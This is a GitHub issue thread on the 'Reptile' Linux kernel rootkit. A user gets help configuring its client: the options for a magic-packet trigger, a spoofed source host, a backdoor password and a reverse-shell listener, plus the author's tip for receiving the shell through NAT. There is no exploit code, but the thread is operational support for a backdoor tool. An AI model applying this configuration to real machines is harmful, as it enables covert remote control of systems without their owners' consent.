f0rb1dd3n / Reptile

LKM Linux rootkit
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How to set PORT ? #57

Closed MRchen532 closed 4 years ago

MRchen532 commented 5 years ago

reptile-client> set PORT TCP=1 [-] wrong parameter! How to set PORT ?

pyperanger commented 5 years ago


did you try read the manual bro???

The right argument is RPORT !!!


Reptile Usage: https://github.com/f0rb1dd3n/Reptile/wiki/Usage

RTFM: https://en.wikipedia.org/wiki/RTFM

MRchen532 commented 5 years ago

Yes,I see it,but there has been no access.I don't know if my parameter configuration is wrong. Can you help me?

MRchen532 commented 5 years ago


LHOST Local host to receive the shell LPORT 4444 Local port to receive the shell SRCHOST Source host on magic packets (spoof) SRCPORT 666 Source port on magic packets (only for TCP/UDP) RHOST Remote host RPORT 22 Remote port (only for TCP/UDP) PROT 80 Protocol to send magic packet (ICMP/TCP/UDP) PASS s3cr3t Backdoor password (optional) TOKEN hax0r Token to trigger the shell

reptile-client> run [+] Using password: s3cr3t [+] Listening on port 4444... Always been like this

f0rb1dd3n commented 5 years ago

if you are trying to use it through NAT, use SRCHOST == LHOST

Obviously if the sender of the magic packet is the same host that you are receiving the reverse shell.

MRchen532 commented 5 years ago

Ok, I have solved it, thank you! I also want to know what technologies are used for communication, hidden file hiding, and remote control?